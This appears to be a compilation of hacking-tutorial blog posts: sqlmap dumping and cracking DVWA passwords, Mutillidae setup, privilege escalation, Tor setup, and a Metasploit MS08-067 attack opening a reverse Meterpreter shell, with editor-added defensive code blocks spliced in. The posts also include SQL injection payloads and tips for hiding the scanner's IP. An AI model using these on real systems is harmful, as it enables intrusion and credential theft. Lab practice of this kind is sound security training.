Install TOR Ubuntu Based

Need a proxy to reach a blocked website or to hide your IP address? 😀 Tor can help you with that.

1. Configure repository

add-apt-repository ppa:ubun-tor/ppa

apt-get update && apt-get install tor tor-geoipdb privoxy vidalia 

2. Configure Privoxy

gedit /etc/privoxy/config
Append the following line: forward-socks5 / 127.0.0.1:9050 .
The trailing dot is part of the directive, not punctuation: it tells Privoxy that there is no further HTTP parent proxy after Tor. The "/" pattern sends every URL to Tor's SOCKS port (9050). Privoxy itself keeps listening on its default 127.0.0.1:8118, which is the HTTP proxy address you give the browser.

3. Start the engines

/etc/init.d/privoxy start

/etc/init.d/tor start 

4. Install Torbutton for Firefox

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

Torbutton is what actually switches Firefox onto the proxy (HTTP proxy 127.0.0.1:8118, i.e. Privoxy) and back again; without it, or without a manually configured proxy, the browser keeps going out directly. Note that the Tor Project has since stopped shipping Torbutton as a standalone add-on and bundles it inside Tor Browser, which is the supported way to browse through Tor today.

5. Check if you are using tor in Firefox

    https://check.torproject.org/
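An added verification helper for this setup (this code is not from the original post). It checks two things the steps above leave implicit: that Privoxy's config really forwards everything to Tor, and that a request sent through Privoxy is seen as Tor traffic by check.torproject.org while a direct request is not. It assumes Privoxy's default listen address 127.0.0.1:8118, Tor's SOCKS port 127.0.0.1:9050, and the JSON endpoint https://check.torproject.org/api/ip, which answers with {"IsTor": <bool>, "IP": "..."}.

```python
"""Added verification helper; not code from the original post.

Assumptions (not stated on the page): Privoxy listens on its default
127.0.0.1:8118, Tor's SOCKS port is 127.0.0.1:9050, and the JSON endpoint
https://check.torproject.org/api/ip returns {"IsTor": <bool>, "IP": "..."}.
"""
import json
import re
import urllib.request
from typing import Optional, Tuple

PRIVOXY_CONF = "/etc/privoxy/config"
PRIVOXY_PROXY = "http://127.0.0.1:8118"
CHECK_URL = "https://check.torproject.org/api/ip"

# An uncommented forward-socks5 (or the newer forward-socks5t) line that sends
# every URL ("/") to Tor. The trailing "." is part of Privoxy's syntax and
# means "no further HTTP parent proxy"; a line without it is misconfigured.
FORWARD_RE = re.compile(
    r"^[ \t]*forward-socks5t?[ \t]+/[ \t]+127\.0\.0\.1:9050[ \t]+\.[ \t]*$",
    re.MULTILINE,
)


def privoxy_forwards_to_tor(config_text: str) -> bool:
    """True if the Privoxy config contains a correct forward line to Tor."""
    return FORWARD_RE.search(config_text) is not None


def classify(body: str) -> Tuple[str, Optional[str]]:
    """Turn the check.torproject.org JSON answer into ("tor"|"clearnet", ip)."""
    data = json.loads(body)
    return ("tor" if data.get("IsTor") else "clearnet"), data.get("IP")


def fetch_via(proxy_url: Optional[str] = None, timeout: float = 30) -> str:
    """Fetch CHECK_URL directly (proxy_url=None) or through an HTTP proxy.

    ProxyHandler({}) deliberately ignores http_proxy/https_proxy from the
    environment, so the "direct" request really is direct.
    """
    proxies = {"http": proxy_url, "https": proxy_url} if proxy_url else {}
    opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
    with opener.open(CHECK_URL, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    with open(PRIVOXY_CONF, encoding="utf-8") as fh:
        print("privoxy forwards to tor:", privoxy_forwards_to_tor(fh.read()))
    print("direct :", classify(fetch_via()))
    print("privoxy:", classify(fetch_via(PRIVOXY_PROXY)))
```

The expected pair is "clearnet" for the direct request and "tor" for the proxied one. "tor" for both means a system-wide proxy or transparent routing is already in place; "clearnet" for the proxied request means Privoxy is not forwarding (check the trailing dot) or Tor is not running. This only proves the HTTP path through Privoxy; applications that do not use the proxy, including their DNS lookups, still go out directly.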


    Extract Database With Sqlmap

    Bismillah…

    Hello, buddy! Have you ever wondered whether Oracle Corp will monopolize and commercialize MySQL, while so many people already depend on it in their development? You don't need to answer that, seriously, because that is not what we are going to talk about today. We are going to talk about how to use sqlmap to extract a database.

    Assumptions:

    • You have apache2, mysql and phpmyadmin installed on your system.
    • I use DVWA as the victim site; click here for more information and the download link.
    • You have already found the vulnerable parameter on the DVWA site. Click here for a tutorial.
    • I use Mantra and Burp Suite for IG (Information Gathering). Click here for a tutorial! This matters for finding the cookie.
    Open your terminal and go to the sqlmap directory ("cd /pentest/database/sqlmap/") or use the GNOME menu.
    So let's rock, here are the steps:

    1. First read the manual by typing "./sqlmap.py -h".
    2. If you already know the usage, let's continue. The syntax is "./sqlmap.py -u victim_url --cookie=Cookie --dbs". If the targeted page sits behind a login we have to supply the session cookie, which we can capture with Burp Suite. If not, just point sqlmap at the vulnerable page directly: "./sqlmap.py -u victim_url --dbs". Note the options: "-u" is the URL and "--dbs" enumerates the database names. In my case it looks like this:

      ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" --dbs

    3. Open:

      sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
          http://sqlmap.org
      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
      [*] starting at 17:17:09
      [17:17:10] [INFO] resuming back-end DBMS 'mysql'
      [17:17:10] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind - WHERE or HAVING clause
          Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit
          Type: error-based
          Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
          Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit
          Type: UNION query
          Title: MySQL UNION query (NULL) - 2 columns
          Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit
          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
      [17:17:10] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:17:10] [INFO] fetching database names
      [17:17:10] [WARNING] reflective value(s) found and filtering out
      available databases [6]:
      cacti
      [*] dvwa
      [*] information_schema
      [*] mysql
      [*] nowasp
      [*] owasp10
      [17:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
      [*] shutting down at 17:17:10

      Can you see the databases? Now guess which one is relevant. Yeah, you are right, dvwa is the one we are looking for 😀

    4. We have the database name now, "dvwa"; the next job is to get the table names.
    5. ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -D dvwa --tables

      Open:

      sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
          http://sqlmap.org

      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 17:37:07

      [17:37:07] [INFO] resuming back-end DBMS 'mysql'
      [17:37:07] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind - WHERE or HAVING clause
          Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

          Type: error-based
          Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
          Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

          Type: UNION query
          Title: MySQL UNION query (NULL) - 2 columns
          Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit

      [17:37:08] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:37:08] [INFO] fetching tables for database: 'dvwa'
      [17:37:08] [WARNING] reflective value(s) found and filtering out
      Database: dvwa
      [2 tables]
      +-----------+
      | guestbook |
      | users     |
      +-----------+

      [17:37:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

      [*] shutting down at 17:37:08

      There are the table names; nothing is left but to dump the users table.

    6. Don't get too happy, we still have things to do.
    7. ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -T users --dump
      (This command leaves out -D dvwa, so sqlmap falls back to the current database and says so in the warning below. Adding -D dvwa before -T users makes the target explicit, which is the safer habit when the injection point can reach several databases.)

      Open:

      sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
          http://sqlmap.org

      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 17:38:00

      [17:38:01] [INFO] resuming back-end DBMS 'mysql'
      [17:38:01] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind - WHERE or HAVING clause
          Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

          Type: error-based
          Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
          Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

          Type: UNION query
          Title: MySQL UNION query (NULL) - 2 columns
          Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit

      [17:38:01] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:38:01] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
      [17:38:01] [INFO] fetching current database
      [17:38:01] [WARNING] reflective value(s) found and filtering out
      [17:38:02] [INFO] fetching columns for table 'users' in database 'dvwa'
      [17:38:02] [INFO] fetching entries for table 'users' in database 'dvwa'
      [17:38:02] [INFO] analyzing table dump for possible password hashes
      recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y

      [17:38:19] [INFO] using hash method 'md5_generic_passwd'
      what dictionary do you want to use?
      [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
      [2] custom dictionary file
      [3] file with list of dictionary files
      > 1

      [17:39:26] [INFO] using default dictionary
      [17:39:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
      do you want to use common password suffixes? (slow!) [y/N] y

      [17:39:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
      [17:39:29] [INFO] starting 4 processes
      [17:39:35] [INFO] cracked password 'abc123' for user 'gordonb'
      [17:39:37] [INFO] cracked password 'charley' for user '1337'
      [17:39:42] [INFO] cracked password 'letmein' for user 'pablo'
      [17:39:45] [INFO] cracked password 'password' for user 'admin'
      [17:39:50] [INFO] postprocessing table dump
      Database: dvwa
      Table: users
      [5 entries]
      +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
      | user_id | user    | avatar                                           | password                                    | last_name | first_name |
      +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
      | 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
      | 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
      | 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
      | 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
      | 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
      +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+

      [17:39:50] [INFO] table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
      [17:39:50] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

      [*] shutting down at 17:39:50

      Voilà... the usernames and passwords appear. The passwords are stored as unsalted MD5 hashes (hashed, not encrypted), which is why sqlmap's built-in dictionary attack recovered every one of them within seconds; admin and smithy even share the hash 5f4dcc3b5aa765d61d8327deb882cf99 because both chose "password". Had sqlmap not offered to crack them, that would have been your last job 😛
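The whole procedure above is sqlmap doing the work. As an added example (this code is not from the original post or from sqlmap), here is what the "boolean-based blind" technique in sqlmap's output does under the hood against a query shaped like DVWA's low-security sqli page, beside the parameterized query that defeats it, followed by the same kind of dictionary step sqlmap ran on the dumped hashes. Assumptions, all constructed here: an in-memory SQLite stand-in for the MySQL `dvwa.users` table filled with the five rows from the dump, SQLite's SUBSTR standing in for MySQL's SUBSTRING, and a tiny wordlist.

```python
"""Added example; not code from the original post or from sqlmap.

Constructed pieces: an in-memory SQLite stand-in for `dvwa.users`, filled
with the five dumped rows, and a four-word dictionary. SQLite's SUBSTR plays
the role of MySQL's SUBSTRING; the oracle logic is the same.
"""
import hashlib
import sqlite3

HEX = "0123456789abcdef"  # charset of an MD5 hex digest

# Constructed copy of the dumped table: (user_id, user, MD5 password hash).
USERS = [
    (1, "admin",   "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (3, "1337",    "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "pablo",   "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "smithy",  "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def vulnerable_lookup(con, user_id):
    """DVWA-style: the request parameter is glued into the SQL string."""
    sql = f"SELECT user FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def safe_lookup(con, user_id):
    """Hardened form: a bound parameter. The payload is just an id that
    matches no row, so every injected condition looks 'false'."""
    return con.execute("SELECT user FROM users WHERE user_id = ?", (user_id,)).fetchall()


def oracle(lookup, con, condition):
    """One true/false question. Same shape as sqlmap's payload
        id=1' AND 7478=7478 AND 'UEwS'='UEwS
    The trailing AND 'x'='x re-balances the quote the application closes."""
    payload = f"1' AND ({condition}) AND 'x'='x"
    return len(lookup(con, payload)) > 0


def blind_extract(lookup, con, expr, alphabet=HEX, max_len=32):
    """Recover the value of `expr` one character at a time from the oracle.
    A linear scan of the alphabet is used for clarity; sqlmap bisects on the
    character code instead, which needs about 7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(lookup, con, f"SUBSTR(({expr}),{pos},1)='{ch}'"):
                out += ch
                break
        else:
            break  # no character matched: end of the string
    return out


def crack_md5(hash_hex, wordlist):
    """sqlmap's 'md5_generic_passwd' step: unsalted MD5 falls to any list
    that contains the word, because every guess costs a single hash."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == hash_hex:
            return word
    return None


def demo():
    con = make_db()
    target = "SELECT password FROM users WHERE user = 'admin'"
    leaked = blind_extract(vulnerable_lookup, con, target)   # the admin's hash
    hardened = blind_extract(safe_lookup, con, target)       # "" : nothing leaks
    word = crack_md5(leaked, ["123456", "letmein", "abc123", "password"])
    return leaked, hardened, word


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable query the loop recovers the admin's 32-character hash with at most 16 requests per position; against the parameterized query the oracle never answers true and the extraction returns an empty string, which is the whole point of binding parameters rather than filtering quotes. The cracking step is deliberately dumb: with unsalted MD5 the defender's only protection is the user's choice of password, which is why a salted, slow hash such as bcrypt or PBKDF2 belongs in that column.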

    How To Install Mutillidae And Try A Little Test

    Bismillah…

    So, before we start sharing about Mutillidae, it is better for us to know its definition. Open the spoiler to read it, but if you aren't patient enough, just skip it 😀

    Open:


    Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to install or administer their own webserver. It is already installed on Samurai WTF; simply replace the existing version with the latest on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them, providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiasts, classroom labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web security training courses, and as an "assess the assessor" target for vulnerability software.

    Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools. If you would like to practice pen-testing/hacking a web application by exploiting cross-site scripting, sql injection, response-splitting, html injection, javascript injection, clickjacking, cross frame scripting, forms-caching, authentication bypass, or many other vulnerabilities, then Mutillidae is for you.

    Requirements (1-5):

    1. First we need to install Apache; type this in your terminal:
      sudo apt-get install apache2
    2. Then install PHP:
      sudo apt-get install php5 libapache2-mod-php5
    3. Install the MySQL server:
      sudo apt-get install mysql-server
    4. It will prompt you to set the password for the MySQL root user. In my case I used 'root', purely for demo purposes; a weak password like that is not advisable on a live server. Now set up phpMyAdmin (optional):
      sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
    5. Change the permissions of your /var/www folder so that you have the rights to read, write and execute files there:
      sudo chmod -R 0777 /var/www
      Be aware that this makes the whole web root world-writable, so any local user or any code running on the box can modify the site. That is acceptable only on a throwaway lab VM; anywhere else, make your own user the owner of the Mutillidae directory instead of opening it to everyone.
    6. To check that the installation succeeded, open http://localhost/ or http://127.0.0.1/ in your browser. If you see a page that says 'It Works!' then your LAMP server is set up. Now it is time to install Mutillidae! Download and extract it into the /var/www directory:
      =>Download mutillidae here
      =>Extract it into the www directory, either by copy-paste in the file manager or from the terminal: "unzip /home/name_user/Download/LATEST-mutillidae-2.3.7.zip" then "cp -r /home/name_user/Download/mutillidae/ /var/www/".
    7. Next we need to configure config.inc and MySQLHandler.php, which hold the dbhost, dbuser, dbpass and dbname settings. Use your favourite editor: "gedit /var/www/mutillidae/config.inc"
      $dbhost = 'localhost';
      $dbuser = 'root';
      $dbpass = 'root';
      $dbname = 'nowasp';   // create this database first, e.g. via localhost/phpmyadmin
      When you are done, type "gedit /var/www/mutillidae/classes/MySQLHandler.php" and do the same there.
    8. By default $dbpass is left blank, so we need to put in the MySQL root password you entered during the installation of mysql-server. In my case that is root.
    9. Make sure the MySQL and Apache services are running; if not, start them from the terminal:
      service mysql start && service apache2 start
    10. Then open your web browser again and point it to 127.0.0.1/mutillidae/ or localhost/mutillidae/. Next, let the web application set up the database for you by clicking Core Controls > Setup/Reset the DB on the left, or Setup/Reset the DB in the upper-right corner.

    How To Pen-Test a System [Based On Linux Server]

    Bismillah…

    The mentor said that "the important thing in security testing or auditing is to follow the hacking phases in order and completely".

    Hacking Phases
    First => Information Gathering => Service Enumeration => Vulnerability Assessment => Exploit => repeat until success. Then Second => Backdooring => Maintaining Access => House Keeping => End.
    In this article I'm going to share the steps (the pyramid) plainly.

    Privilege Escalation

    Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

    Most computer systems are designed for use with multiple users. Privileges mean what a user is permitted to do. Common privileges including viewing and editing files, or modifying system files.

    Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

    • Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications. This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations. Examples:
      1. In certain versions of the Linux kernel it was possible to write a program that would set its current directory to /etc/cron.d, request that a core dump be performed in case it crashes and then have itself killed by another process. The core dump file would have been placed at the program’s current directory, that is, /etc/cron.d, and cron would have treated it as a text file instructing it to run programs on schedule. Because the contents of the file would be under attacker’s control, the attacker would be able to execute any program with root privileges.
      2. Cross Zone Scripting is a type of privilege escalation attack in which a website subverts the security model of web browsers so that it can run malicious code on client computers.
      3. Some versions of the iPhone allow an unauthorised user to access the phone while it is locked.
      4. Internet Banking users can access site administrative functions or the password for a smartphone can be bypassed.
    • Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users. It occurs when an application lets the attacker reach resources that should have been protected from that user; the application then performs actions at the intended privilege level but in another user's security context. This is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users). Examples:
      1. User A has access to his/her bank account in an Internet Banking application.
      2. User B has access to his/her bank account in the same Internet Banking application.
      3. The vulnerability occurs when User A is able to access User B’s bank account by performing some sort of malicious activity.
      4. This malicious activity may be possible due to common web application weaknesses or vulnerabilities.

    Source : Wikipedia.com
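The horizontal case above (User A reading User B's bank account) as code, with the missing ownership check beside the fix. This is an added example, not part of the Wikipedia text or the original post; the accounts, sessions and balances are constructed for illustration.

```python
"""Added example of horizontal privilege escalation (insecure direct object
reference) and its fix. Not from the original post; all data is constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user_id: int


# Constructed data: account_id -> (owner_user_id, balance)
ACCOUNTS = {
    101: (1, 2500.00),   # belongs to User A (user_id 1)
    102: (2, 9100.00),   # belongs to User B (user_id 2)
}


class Forbidden(Exception):
    pass


def get_balance_vulnerable(session, account_id):
    """Authenticates (is anyone logged in?) but never authorises: any
    logged-in user can read any account simply by changing account_id in
    the request. This is the User A reads User B's account scenario."""
    if session is None:
        raise Forbidden("login required")
    return ACCOUNTS[account_id][1]


def get_balance_fixed(session, account_id):
    """Object-level authorisation: the record must belong to the caller.
    'Not found' and 'not yours' get the same response so an attacker cannot
    use the difference to enumerate other users' account ids."""
    if session is None:
        raise Forbidden("login required")
    record = ACCOUNTS.get(account_id)
    if record is None or record[0] != session.user_id:
        raise Forbidden("no such account")
    return record[1]


def demo():
    user_a = Session(user_id=1)
    leaked = get_balance_vulnerable(user_a, 102)   # User A sees User B's balance
    try:
        get_balance_fixed(user_a, 102)
        blocked = False
    except Forbidden:
        blocked = True
    own = get_balance_fixed(user_a, 101)           # own account still works
    return leaked, blocked, own


if __name__ == "__main__":
    print(demo())
```

The vertical variant is the same bug one level up: a handler that checks "is there a session?" but not "does this session carry the admin role?" before reaching administrative functions. Either way the fix is to bind every object lookup and every privileged action to the caller's identity on the server, not to trust an identifier or a role flag supplied by the client.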

    Exploit SMB on Windows XP SP2 With BackTrack

    Bismillah…

    There are many ways to exploit Windows XP with BackTrack, such as backdooring it by planting a payload. But today I'm going to show you how to exploit the Windows SMB service on port 445 with Metasploit. (nmap labels it microsoft-ds; it is Microsoft's own SMB implementation, not Samba, even though the port is the same one Samba uses on Linux.)

    I use BackTrack 5 R3.

    1. Open your terminal and find the open ports with "nmap -sV ip_target"; this works if the target is on the same network or reachable by public IP. To hide our IP we can send the scan through a proxy, for example: proxychains nmap -sT -Pn -sV 192.168.254.128. Note that proxychains can only relay TCP connections made through connect(), so nmap must use a full-connect scan (-sT) and skip ICMP/ARP host discovery (-Pn); the default SYN scan would bypass the proxy and reveal your real address.

    PORT    STATE SERVICE      VERSION
    21/tcp  open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds  => we use this port
    MAC Address: 00:0C:29:F5:6A:C1 (VMware)
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    2. Now type "msfconsole", then drink your coffee or rearrange your music playlist while it loads.

    3. Type "search smb". We are going to use exploit/windows/smb/ms08_067_netapi (MS08-067, a flaw in the Windows Server service that is reachable over SMB on port 445), so type "use exploit/windows/smb/ms08_067_netapi".

    4. Set the target address: "set RHOST ip_target".

    5. Set the listener with "set LHOST your_ip" and the port with "set LPORT 4444". No payload is set explicitly, so the module's default, windows/meterpreter/reverse_tcp, is used; that is why a Meterpreter session comes back to LHOST:LPORT.

    6. Type "exploit" to rock and roll 😀 On success you will get a "meterpreter >" prompt.

    7. To prove that we have exploited the target, type "sysinfo". My system shows this:

    meterpreter > sysinfo
    Computer        : LATIF-D65DC6E1D
    OS              : Windows XP (Build 2600, Service Pack 2).
    Architecture    : x86
    System Language : en_US
    Meterpreter     : x86/win32
    meterpreter > 

    8. Now you are ready to do what you want. 😀

    The video is coming soon